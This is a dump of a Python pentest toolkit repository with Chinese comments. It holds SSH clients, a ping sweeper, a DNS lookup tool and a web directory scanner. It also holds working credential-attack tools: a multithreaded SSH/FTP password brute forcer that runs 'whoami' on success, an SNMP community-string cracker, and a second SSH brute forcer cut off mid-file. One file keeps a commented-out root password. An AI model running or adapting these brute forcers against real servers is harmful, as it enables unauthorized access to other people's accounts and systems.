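![图片](images/640-16432009920047-16444876053866.webp) 59 | 60 | ![微信图片_20220427110850](images/微信图片_20220427110850.jpg) 61 | 62 | 63 | 64 | **欢迎star:star: O(∩_∩)O** -------------------------------------------------------------------------------- /MyInteractive_SSH.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import paramiko 3 | import sys 4 | import time 5 | import platform 6 | import re 7 | 8 | # ip = "192.168.148.128" 9 | # port = "22" 10 | # 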
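username = "root"
# (The commented-out password and timeout defaults that followed here in the
#  original were removed: every value comes from the command line.)
RECV_BUFLEN = 32768     # bytes read from the SSH channel per recv()
MAX_WAIT_OUTPUT = 32    # polls of 0.5 s to wait for output before prompting for the next command

'''
Interactive SSH: cd and more work, but vim does not seem to.
'''


def Interactive_SSH(ip, port, username, password, SSH_CON_TIMEOUT=10):
    """Open an interactive shell on ip:port and relay stdin/stdout until EOF.

    Parameters mirror paramiko.SSHClient.connect(); SSH_CON_TIMEOUT is the TCP
    connect timeout in seconds.  Any paramiko/socket error is printed and the
    session ends; the client is always closed.
    """
    ssh = paramiko.SSHClient()
    try:
        print('[-] try login ssh {}@{}:{} .....'.format(username, ip, port))
        # AutoAddPolicy accepts whatever host key is presented, including one
        # from a machine impersonating the target.  Fine for a throwaway lab
        # host; not for anything whose identity matters.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # compress=True enables transport compression
        ssh.connect(ip, port=port, username=username, password=password, compress=True, timeout=SSH_CON_TIMEOUT)
        print('[+] Login successfully')
        # The password is deliberately not echoed: stdout routinely ends up in
        # logs and screenshots.
        print('[+] username:', username)
        channel = ssh.invoke_shell()
        channel.settimeout(5)

        while True:
            waited = 0
            while not channel.recv_ready() and waited < MAX_WAIT_OUTPUT:
                time.sleep(0.5)
                waited += 1
            if channel.recv_ready():
                result = channel.recv(RECV_BUFLEN)
                if not result:          # remote side closed the channel
                    break
                printdata(result.decode(errors='replace'))
            elif channel.exit_status_ready():
                break
            # The original called recv() even when nothing was ready, so a
            # quiet shell hit the 5 s timeout and the whole session ended.
            command = sys.stdin.readline()
            if command == '':           # EOF on stdin: stop instead of sending '' forever
                break
            channel.send(command)
    except Exception as e:
        print("Error:", e)
    finally:
        ssh.close()


def printdata(data):
    """Print *data* without a trailing newline, stripping ANSI colour codes on Windows.

    The original printed only on "Windows" and "Linux"; any other platform
    silently lost all output.
    """
    if platform.system() == "Windows":
        print(re.sub(r'\x1b\[.*?m', '', data, flags=re.M), end='')
    else:
        print(data, end='')


if __name__ == '__main__':
    usage = """
Interactive SSH connection

"""
    parser = argparse.ArgumentParser(usage=usage, description="des")
    parser.add_argument("-H", "--host", type=str, dest="host", required=True, help="Hosts to scan")
    parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan")
    parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout")
    parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username")
    parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password")
    args = parser.parse_args()

    Interactive_SSH(args.host, args.port, args.username, args.password, args.timeout)
-------------------------------------------------------------------------------- /MyMultithreadPing.py: --------------------------------------------------------------------------------
import os
import subprocess
import sys
import threading
import time
from queue import Empty, Queue

'''
Multithreaded ping.  Still missing: a file argument and a thread-count argument.
'''
Thread_maxnum = 50      # worker threads
PING_TIMEOUT_S = 5      # wait per reply; Windows ping takes milliseconds, Linux ping seconds


def _ping_command(ip):
    """Build the ping argv for this platform.

    List form with shell=False: *ip* is passed as one argument and is never
    interpreted by a shell, and the Linux branch actually works -- the
    original passed a single string, which subprocess treats as the program
    name on POSIX.  The Windows -w value is converted to milliseconds; the
    original's "-w 5" meant 5 ms and timed out on almost every host.
    """
    if os.name == 'nt':
        return ['ping', '-n', '2', '-w', str(PING_TIMEOUT_S * 1000), ip]
    return ['ping', '-c', '2', '-w', str(PING_TIMEOUT_S), ip]


def ping_ip(IP_QUEUE):
    """Worker: ping every address taken from IP_QUEUE and report those that answer.

    Output is discarded instead of piped (nothing ever read the pipe).  The
    non-blocking get lets several workers drain the queue without one of them
    blocking forever on the last item.
    """
    while True:
        try:
            ip = IP_QUEUE.get(block=False)
        except Empty:
            return
        res = subprocess.call(_ping_command(ip), stdout=subprocess.DEVNULL)
        if res == 0:
            print(ip, 'is Alive.')


if __name__ == '__main__':
    title = '''
Multithread ping,the default threads is 50.
Usage:
    python3 ping.py 10.10.10.10
    python3 ping.py 10.10.10.10 10.10.10.11
    python3 ping.py 10.10.10.10-20
    python3 ping.py 10.10.10.10/24
'''
    if len(sys.argv) < 2 or sys.argv[1] == '-h':
        # The original indexed sys.argv[1] unguarded and, after printing the
        # help, went on to ping the string "-h".
        print(title)
        raise SystemExit(0)
    IP_QUEUE = Queue()
    if len(sys.argv) == 2:
        ips = sys.argv[1]
        if '/' in ips:
            # 192.168.1.1/24 -- the prefix length is not parsed; .1-.254 of the /24 is assumed
            ip_csection = ips.rsplit('.', 1)[0]
            for i in range(1, 255):
                IP_QUEUE.put(ip_csection + '.' + str(i))
        elif '-' in ips:
            # 192.168.1.2-10
            base, last = ips.rsplit('-', 1)
            ip_csection, start = base.rsplit('.', 1)
            for i in range(int(start), int(last) + 1):
                IP_QUEUE.put(ip_csection + '.' + str(i))
        else:
            IP_QUEUE.put(ips)
    else:
        # sys.argv[1:], not sys.argv: the original also "pinged" the script path.
        for ip in sys.argv[1:]:
            IP_QUEUE.put(ip)
    threads = []
    start_time = time.time()
    for _ in range(Thread_maxnum):
        thread = threading.Thread(target=ping_ip, args=(IP_QUEUE,))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

    print('程序运行耗时:%s' % (time.time() - start_time))
-------------------------------------------------------------------------------- /MyNointeractive_SSH.py: --------------------------------------------------------------------------------
import argparse
import datetime
import paramiko
import platform
import re

# The original defined module-level ip/port/username/password/SSH_CON_TIMEOUT
# here, including a real-looking host and password.  They were overwritten by
# the CLI values before use and have been dropped so no credential lives in
# the source.


def Nointeractive_SSH(ip, port, username, password, SSH_CON_TIMEOUT=5):
    """Log in over SSH and run one exec_command() per line typed at "shell>".

    Each command runs in a fresh session, so state such as the working
    directory does not carry over.  Typing "exit" returns.  Both stdout and
    stderr of the command are shown; the original discarded stderr, so
    failing commands looked like they produced nothing.
    """
    ssh = paramiko.SSHClient()
    try:
        print('[-] try login ssh {}@{}:{} .....'.format(username, ip, port))
        # Accepts any presented host key (no MITM protection); lab use only.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # compress=True enables transport compression
        ssh.connect(ip, port=port, username=username, password=password, compress=True, timeout=SSH_CON_TIMEOUT)
        print('[+] Login successfully')
        print('[+] username: ', username)   # password intentionally not echoed
        while True:
            print()
            cmd = input("shell>")
            if cmd == "exit":
                return
            # stdin is unused; stdout and stderr are independent streams.
            _stdin, stdout, stderr = ssh.exec_command(cmd)
            printdata(stdout.read().decode('utf-8', errors='replace'))
            printdata(stderr.read().decode('utf-8', errors='replace'))
    except Exception as e:
        print("Error:", e)
    finally:
        ssh.close()


def printdata(data):
    if 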
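platform.system() == "Windows":
        dataa = re.sub(r'\x1b\[.*?m', '', data, flags=re.M)
        print(dataa, end='')
    else:
        # The original printed only on "Linux"; other platforms lost all output.
        print(data, end='')


if __name__ == '__main__':
    usage = """
Non Interactive SSH connection
Input exit to quit.
"""
    parser = argparse.ArgumentParser(usage=usage, description="des")
    parser.add_argument("-H", "--host", type=str, dest="host", required=True, help="Hosts to scan")
    parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan")
    parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout")
    parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username")
    parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password")
    args = parser.parse_args()

    Nointeractive_SSH(args.host, args.port, args.username, args.password, args.timeout)
-------------------------------------------------------------------------------- /MyNslookup.py: --------------------------------------------------------------------------------
import sys

import dns.exception
import dns.resolver

"""
Nslookup program (A, CNAME, MX, TXT and similar records).
Finished, but some record types do not work well.
"""


class pynslookup:
    """Thin wrapper over dns.resolver returning the first record of each type as text.

    Every getter returns the string 'None' (the original's output marker)
    when the name has no such record or the lookup fails.
    """

    def __init__(self, domain='', type=''):
        self.domain = domain   # stored but not read by result(); kept for compatibility
        self.type = type

    def bytetostring(self, bv):
        """Decode one TXT rdata chunk (bytes) to str."""
        return bv.decode()

    def getSPFKey(self, domain):
        """Return the 'spf.<domain>' label the original looks up for SPF text."""
        return 'spf' + "." + domain

    def _first_or_none(self, domain, rdtype, pick):
        """Resolve domain/rdtype and return pick(first rdata), or 'None' on any DNS failure.

        dns.exception.DNSException is the base of NoAnswer as well as
        NXDOMAIN, NoNameservers and the timeout errors; the original caught
        only NoAnswer, so a non-existent or unreachable domain aborted the run.
        """
        try:
            for rdata in dns.resolver.resolve(domain, rdtype):
                return pick(rdata)
        except dns.exception.DNSException:
            pass
        return 'None'

    def getSPFValue(self, domain):
        """First TXT string under spf.<domain>, or 'None'."""
        return self.getTvalue(self.getSPFKey(domain))

    def getTvalue(self, domain):
        """First TXT string of *domain* (first rdata that has one), or 'None'."""
        try:
            for tdata in dns.resolver.resolve(domain, 'TXT'):
                for txt_string in tdata.strings:
                    return self.bytetostring(txt_string)
        except dns.exception.DNSException:
            pass
        return 'None'

    def getMXvalue(self, domain):
        """Exchange host of the first MX record ("<preference> <host>" -> host), or 'None'."""
        return self._first_or_none(domain, 'MX', lambda rdata: rdata.to_text().split(' ')[1])

    def getCNAMEvalue(self, domain):
        """Target of the first CNAME record, or 'None'."""
        return self._first_or_none(domain, 'CNAME', lambda rdata: rdata.to_text())

    def getAvalue(self, domain):
        """First A record address, or 'None'."""
        return self._first_or_none(domain, 'A', lambda rdata: rdata.to_text())

    def result(self, domain, type=''):
        """Collect the requested record type(s) for *domain* into a dict.

        type '' queries A, CNAME, MX and TXT; one of 'A'/'CNAME'/'MX'/'TXT'
        queries just that type.  (The original's CNAME, MX and TXT branches
        all called getAvalue(), so they reported the A record under the
        wrong key.)  Any other value prints an error and exits with status 1.
        """
        getters = {
            'A': self.getAvalue,
            'CNAME': self.getCNAMEvalue,
            'MX': self.getMXvalue,
            'TXT': self.getTvalue,
        }
        if type == '':
            wanted = list(getters)
        elif type in getters:
            wanted = [type]
        else:
            print('type is error!')
            raise SystemExit(1)
        nslookup_result = {'domain': domain}
        for rdtype in wanted:
            nslookup_result[rdtype] = getters[rdtype](domain)
        return nslookup_result


if __name__ == '__main__':
    title = '''
Nslookup by Python
Get the record, CNAME, MX, TXT, DNS, MX and other information
Usage:
    python3 pynslookup.py www.baidu.com
'''
    # Guarded: the original indexed sys.argv[1] and crashed when run with no argument.
    if len(sys.argv) < 2 or sys.argv[1] == '-h':
        print(title)
    else:
        domain = sys.argv[1]
        result = pynslookup()
        res = result.result(domain)
        for k, v in res.items():
            print(k, ': ', v)
-------------------------------------------------------------------------------- /MyNslookup2.py: 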
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/MyNslookup2.py -------------------------------------------------------------------------------- /My_dirscan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | from queue import Queue 4 | import threading 5 | import random 6 | import csv 7 | import datetime, os 8 | from bs4 import BeautifulSoup 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 13 | 14 | ''' 15 | 全类多线程 dirscan 信息扫描 16 | 还是按照原来的思路,扫描封装到类,多线程外挂类似Mywebscan Myportscan 17 | 注意threading.Thread(target)target 不能有括号,否则会线程卡死 18 | ''' 19 | 20 | include_status = "200, 301, 302" 21 | exclude_status = "500, 502" 22 | 23 | 24 | class My_dirscan: 25 | def __init__(self, site=None, queue=None, dict_file=None, outfile=None, include_status=None, timeout=2, ): 26 | self.site = site 27 | self.timeout = timeout 28 | self.queue = queue 29 | self.dict_file = dict_file 30 | self.outfile = outfile 31 | self.include_status = include_status 32 | # 获取字典初始化的时候执行一次就够了,然后往gueue中送数据 33 | self.get_dict_from_file(self.dict_file) 34 | 35 | # 生成随机UA 36 | def random_useragent(self): 37 | USER_AGENTS = [ 38 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 39 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 40 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 41 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 42 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 
2.0.50727; Media Center PC 6.0)", 43 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 44 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 45 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 46 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 47 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 48 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 49 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 50 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 51 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 52 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 53 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 54 | ] 55 | return random.choice(USER_AGENTS) 56 | 57 | # 进行扫描获取状态码 58 | def get_status_code(self, url=None): 59 | # 支持http / https 60 | header = {'User-Agent': self.random_useragent()} 61 | try: 62 | # print(url) 63 | res = requests.get(url, headers=header, timeout=2) 64 | res.encoding = "utf-8" 65 | status_code = str(res.status_code) 66 | # print(self.include_status) 67 | # print(type(status_code)) 68 | if status_code in self.include_status: 69 | # sys.stdout.write('\r' + '[+]%s\t\t\n' % url) 70 | result = url + '\t\t' + status_code 71 | print("[+]" + result) 72 | if self.outfile is not None: 73 | self.write_file(result) 74 | else: 75 | pass 76 | except Exception: 
77 | pass 78 | 79 | # 获取数据传入管道 80 | def get_dict_from_file(self, dict_file): 81 | with open(dict_file, 'r') as f: 82 | for line in f: 83 | self.queue.put(self.site + '/' + line.strip()) 84 | 85 | def write_file(self, data): 86 | # 如果csvfile是一个文件对象,它应该用newline =''打开。 87 | # with open(self.csvfile, 'a+', newline='')as f: 88 | # # fieldnames = {'URL', 'status_code', 'title', 'timeout', 'headers', 'body'} 89 | # # newline的作用是防止每次插入都有空行 90 | # writer = csv.writer(f) 91 | # writer.writerow(data) 92 | # f = open(datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.txt', 'a+') 93 | f = open(Outfile, 'a+') 94 | f.write(data + '\n') 95 | f.close() 96 | # print('xieru') 97 | # # 保存到本地文件,以HTML的格式 98 | # result = open('result.html', 'a+') 99 | # result.write('' + url + '') 100 | # result.write('\r\n
') 101 | # result.close() 102 | 103 | def start(self): 104 | while not self.queue.empty(): 105 | url = self.queue.get() 106 | # print(url) 107 | # bot = self.web_banner_scan() 108 | self.get_status_code(url) 109 | # result = self.get_status_code(url) 110 | 111 | 112 | if __name__ == '__main__': 113 | usage = """ 114 | Dir scanner. 115 | """ 116 | parser = argparse.ArgumentParser(usage=usage, description="") 117 | parser.add_argument("-f", "--file", type=str, default=None, dest="file", help="Dict file") 118 | # parser.add_argument("-hb", "--headbody", default=False, action="store_true", dest="saveheadbody", 119 | # help="Store header and body") 120 | parser.add_argument("-o", "--output", type=str, default=None, 121 | dest="outputfile", help="Result to txt") 122 | parser.add_argument("-u", "--url", type=str, default=None, dest="url", help="URL") 123 | parser.add_argument("-s", "--status-code", type=str, default=include_status, dest="include_status", 124 | help="Include status") 125 | parser.add_argument("-t", "--thread", type=int, default=50, dest="threads", help="Threads") 126 | parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout") 127 | args = parser.parse_args() 128 | 129 | Site = args.url 130 | Thread_maxnum = args.threads 131 | Timeout = args.timeout 132 | Dict_file = args.file 133 | Outfile = args.outputfile 134 | Include_status = args.include_status.split(',') # 返回list 135 | 136 | URL_QUEUE = Queue() 137 | thread_list = [] 138 | if args.timeout != 0 and args.timeout > 0: 139 | timeout = args.timeout 140 | else: 141 | print("--timeout Setting error.") 142 | exit(1) 143 | dir_scanner_bot = My_dirscan(site=Site, queue=URL_QUEUE, dict_file=Dict_file, outfile=Outfile, 144 | include_status=Include_status, timeout=Timeout) 145 | # web_banner_bot.get_url_from_file(args.file) 146 | # dir_scanner_bot.get_dict_from_file(Dict_file) 147 | print(Thread_maxnum) 148 | for i in range(Thread_maxnum): 149 | # 
注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 150 | thread = threading.Thread(target=dir_scanner_bot.start) 151 | thread_list.append(thread) 152 | # print(thread_list) 153 | # print(thread_list) 154 | for thread in thread_list: 155 | thread.start() 156 | for thread in thread_list: 157 | thread.join() 158 | 159 | if Outfile is not None: 160 | print("[+] Output save in", os.getcwd() + "\\" + Outfile) 161 | -------------------------------------------------------------------------------- /Mybruster.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import paramiko 4 | import ftplib 5 | import threading 6 | from queue import Queue 7 | 8 | 9 | ''' 10 | Mybruster 11 | 目前实现 SSH爆破,FTP爆破 12 | 13 | 可以实现多ip,多端口,自定义账号密码字典,指定账号,爆破密码,指定密码爆破账号,自定义线程等等情况 14 | 踩坑: 15 | -线程执行函数target不能带括号,否则会阻塞其他线程,使得程序变成单线程程序 16 | - SSH爆破,一个实例化对象,只能去输入一个账号密码,去尝试登陆,如果仅实例化一个对象,分给多个线程去从新获得账号密码尝试登陆,则可能产生报错,所以分配个每个线程一个实例化对象。 17 | - FTP爆破同理,每个线程实例化一个对象。 18 | 19 | ''' 20 | 21 | 22 | class Mybruster: 23 | def __init__(self, mode=None, ip=None, ipfile=None, port=None, queue=None, username=None, password=None, 24 | userfile=None, 25 | passfile=None, timeout=5): 26 | self.mode = mode 27 | self.ip = ip 28 | self.ipfile = ipfile 29 | self.port = port 30 | self.queue = queue 31 | self.username = username 32 | self.password = password 33 | self.userfile = userfile 34 | self.passfile = passfile 35 | self.timeout = timeout 36 | self.ip_success_list = [] 37 | # print(passfile) 38 | # 生产者 初始化执行 39 | self.get_data_from_file(self.ip, self.ipfile, self.username, self.password, self.userfile, self.passfile) 40 | if port is None: 41 | if self.mode == "ssh": 42 | self.port = 22 43 | elif self.mode == "ftp": 44 | self.port = 21 45 | 46 | # 获取数据传入管道 47 | def get_data_from_file(self, ip=None, ipfile=None, username=None, password=None, userfile=None, passfile=None): 48 | # 单IP 49 | # print(ip) 50 | # print(passfile) 51 | if ip is not None: 52 | if userfile 
is not None and passfile is not None: 53 | with open(userfile, 'r') as f: 54 | with open(passfile, 'r') as g: 55 | for userline in f: 56 | for passline in g: 57 | self.queue.put((ip, userline.strip(), passline.strip())) 58 | # print((ip, userline.strip(), passline.strip())) 59 | elif username is not None and passfile is not None: 60 | with open(passfile, 'r') as g: 61 | for passline in g: 62 | self.queue.put((ip, username, passline.strip())) 63 | # print((ip, username, passline.strip())) 64 | elif username is not None and password is not None: 65 | self.queue.put((ip, username, password)) 66 | print((ip, username, password)) 67 | else: 68 | print("params set error!") 69 | exit(1) 70 | # 多 IP 情况 71 | elif ipfile is not None: 72 | if userfile is not None and passfile is not None: 73 | with open(ipfile, 'r') as e: 74 | with open(userfile, 'r') as f: 75 | with open(passfile, 'r') as g: 76 | for ipline in e: 77 | for userline in f: 78 | for passline in g: 79 | self.queue.put((ipline.strip(), userline.strip(), passline.strip())) 80 | # print((ipline.strip(), userline.strip(), passline.strip())) 81 | elif username is not None and passfile is not None: 82 | with open(ipfile, 'r') as e: 83 | with open(passfile, 'r') as g: 84 | for ipline in e: 85 | for passline in g: 86 | self.queue.put((ipline.strip(), username, passline.strip())) 87 | # print((ip, username, passline.strip())) 88 | elif username is not None and password is not None: 89 | with open(ipfile, 'r') as e: 90 | for ipline in e: 91 | self.queue.put((ipline.strip(), username, password)) 92 | # print((ipline.strip(), username, password)) 93 | else: 94 | print("params set error!") 95 | exit(1) 96 | 97 | def ssh_bruster(self, ip, username, password, port=22, timeout=5): 98 | # pass 99 | try: 100 | print('[*] try login ssh {}@{}:{} .....'.format(username, ip, port)) 101 | ssh_ob = paramiko.SSHClient() 102 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() 103 | # #加载创建的白名单 104 | 
ssh_ob.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 105 | # compress 启用压缩 106 | ssh_ob.connect(ip, port=int(port), username=username, password=password, compress=True, 107 | timeout=timeout) 108 | stdin, stdout, stderr = ssh_ob.exec_command("whoami") # stdin为输入,stdout为正确输出,stderr为错误输出,同时只有一个变量有值。 109 | # print('[+] Login successfully') 110 | print('[+] Success, {}:{}, username:{}, password:{}, whoami:{}'.format(ip, port, username, password, 111 | stdout.read().decode('utf-8'))) 112 | self.ip_success_list.append(ip) 113 | # self.ssh.close() 114 | return ip 115 | except Exception as e: 116 | # 调试的时候打开下面这句看是什么错误 如果登录不成功会显示如下错误授权失败 Error: Authentication failed. 117 | # print("Error:", e) 118 | ssh_ob.close() 119 | return None 120 | 121 | def ftp_bruster(self, ip, username, password, port=21, timeout=5): 122 | # port = 21 123 | try: 124 | ftp = ftplib.FTP() # 一个线程实例化一个对象,避免冲突 125 | ftp.connect(host=ip, port=int(port), timeout=timeout) 126 | ftp.login(username, password) 127 | # ftp.retrlines('LIST') 128 | ftp.quit() 129 | print('[+] Success, {}:{}, username:{}, password:{}'.format(ip, port, username, password)) 130 | self.ip_success_list.append(ip) 131 | return ip 132 | except ftplib.all_errors: 133 | pass 134 | 135 | # 多线程+ 136 | def start(self): 137 | while not self.queue.empty(): 138 | ip, username, password = self.queue.get() 139 | # 加一个列表,当IP爆破成功后,将IP加入列表,防止其他线程再爆破。 140 | if self.mode == 'ssh': 141 | if ip in self.ip_success_list: 142 | pass 143 | else: 144 | self.ssh_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 145 | elif self.mode == 'ftp': 146 | if ip in self.ip_success_list: 147 | pass 148 | else: 149 | self.ftp_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 150 | else: 151 | print("param -m --mode set error!") 152 | exit(1) 153 | 154 | 155 | if __name__ == '__main__': 156 | usage = """ 157 | Bruster bot By komomon 158 | python test32.py -m ssh -H 192.168.148.128 
--user root -pf asdf.txt 159 | python test32.py -m ftp -H 192.168.148.128 -uf user.txt -pf pass.txt 160 | python test32.py -m ssh -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt 161 | python test32.py -m ssh -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 162 | python test32.py -m ssh -if ipfile.txt -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 163 | """ 164 | parser = argparse.ArgumentParser(usage=usage, description="des") 165 | parser.add_argument("-m", "--mode", type=str, dest="mode", required=True, default=None, help="ssh or ftp") 166 | parser.add_argument("-H", "--host", type=str, dest="host", help="Hosts to scan") 167 | parser.add_argument("-if", "--ipfile", type=str, dest="ipfile", help="IP file") 168 | parser.add_argument("-p", "--port", type=int, dest="port", default=None, help="Port to scan") 169 | parser.add_argument("--user", type=str, dest="username", help="Username") 170 | parser.add_argument("--pass", type=str, dest="password", help="Password") 171 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 172 | parser.add_argument("-pf", "--passfile", type=str, default=None, dest="passfile", help="Password file") 173 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 174 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 175 | args = parser.parse_args() 176 | 177 | Mode = args.mode 178 | Host = args.host 179 | Port = args.port 180 | Ipfile = args.ipfile 181 | Username = args.username 182 | Password = args.password 183 | Userfile = args.userfile 184 | Passfile = args.passfile 185 | Thread_maxnum = args.threads 186 | Timeout = args.timeout 187 | print("Bruster bot is running...") 188 | # print(Passfile) 189 | MY_QUEUE = Queue() 190 | thread_list = [] 191 | if args.timeout != 0 and args.timeout > 0: 192 | timeout = args.timeout 193 | else: 194 | print("--timeout Setting error.") 195 | 
exit(1) 196 | bruster_bot = Mybruster(mode=Mode, ip=Host, ipfile=Ipfile, port=Port, queue=MY_QUEUE, username=Username, password=Password, 197 | userfile=Userfile, passfile=Passfile, timeout=Timeout) 198 | for i in range(Thread_maxnum): 199 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 200 | thread = threading.Thread(target=bruster_bot.start) 201 | thread_list.append(thread) 202 | # print(thread_list) 203 | for thread in thread_list: 204 | thread.start() 205 | for thread in thread_list: 206 | thread.join() 207 | -------------------------------------------------------------------------------- /Mybruster_SNMP 函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/ python 2 | # -*- coding: utf-8 -*- 3 | 4 | __author__ = 'yangxiaodi' 5 | # https://www.cnblogs.com/yangxiaodi/p/5660431.html 6 | 7 | from pysnmp.entity.rfc3413.oneliner import cmdgen 8 | 9 | 10 | def read_file(filepath): 11 | f = open(filepath).readlines() 12 | return f 13 | 14 | 15 | def snmp_connect(ip, key): 16 | crack = 0 17 | try: 18 | errorIndication, errorStatus, errorIndex, varBinds = \ 19 | cmdgen.CommandGenerator().getCmd( 20 | cmdgen.CommunityData('my-agent', key, 0), 21 | cmdgen.UdpTransportTarget((ip, 161)), 22 | (1, 3, 6, 1, 2, 1, 1, 1, 0) 23 | ) 24 | if varBinds: 25 | crack = 1 26 | except: 27 | pass 28 | return crack 29 | 30 | 31 | def snmp_l(): 32 | try: 33 | host = read_file('host.txt') 34 | for ip in host: 35 | ip = ip.replace('\n', '') 36 | passd = read_file('pass.txt') 37 | for pwd in passd: 38 | pwd = pwd.replace('\n', '') 39 | flag = snmp_connect(ip, key=pwd) 40 | if flag == 1: 41 | print("%s snmp has weaken password!!-----%s\r\n" % (ip, pwd)) 42 | break 43 | else: 44 | print("test %s snmp's scan fail" % (ip)) 45 | except Exception as e: 46 | pass 47 | 48 | 49 | if __name__ == '__main__': 50 | snmp_l() 51 | -------------------------------------------------------------------------------- /Mybruster_SSH.py: 
-------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import paramiko 4 | import platform 5 | import re 6 | import ftplib 7 | import threading 8 | from queue import Queue 9 | 10 | 11 | # ip = "192.168.148.128" 12 | # port = "22" 13 | # username = "root" 14 | # password = "981129" 15 | # SSH_CON_TIMEOUT = 10 16 | ''' 17 | 多线程SSH爆破,可以实现多ip,多端口,自定义账号密码字典,自定义爆破 18 | ''' 19 | 20 | class Mybruster: 21 | def __init__(self, ip=None, ipfile=None, port=None, queue=None, username=None, password=None, userfile=None, 22 | passfile=None, timeout=5): 23 | self.ip = ip 24 | self.ipfile = ipfile 25 | self.port = port 26 | self.queue = queue 27 | self.username = username 28 | self.password = password 29 | self.userfile = userfile 30 | self.passfile = passfile 31 | self.timeout = timeout 32 | # self.ssh = paramiko.SSHClient() # 一个ssh对象只能同一时刻进行一个ssh连接,否则会报错 33 | self.ip_success_list = [] 34 | # print(passfile) 35 | # 生产者 初始化执行 36 | self.get_data_from_file(self.ip, self.ipfile, self.username, self.password, self.userfile, self.passfile) 37 | 38 | # 获取数据传入管道 39 | def get_data_from_file(self, ip=None, ipfile=None, username=None, password=None, userfile=None, passfile=None): 40 | # 单IP 41 | # print(ip) 42 | # print(passfile) 43 | if ip is not None: 44 | if userfile is not None and passfile is not None: 45 | with open(userfile, 'r') as f: 46 | with open(passfile, 'r') as g: 47 | for userline in f: 48 | for passline in g: 49 | self.queue.put((ip, userline.strip(), passline.strip())) 50 | # print((ip, userline.strip(), passline.strip())) 51 | elif username is not None and passfile is not None: 52 | with open(passfile, 'r') as g: 53 | for passline in g: 54 | self.queue.put((ip, username, passline.strip())) 55 | # print((ip, username, passline.strip())) 56 | elif username is not None and password is not None: 57 | self.queue.put((ip, username, password)) 58 | print((ip, username, password)) 59 | else: 60 | print("params set 
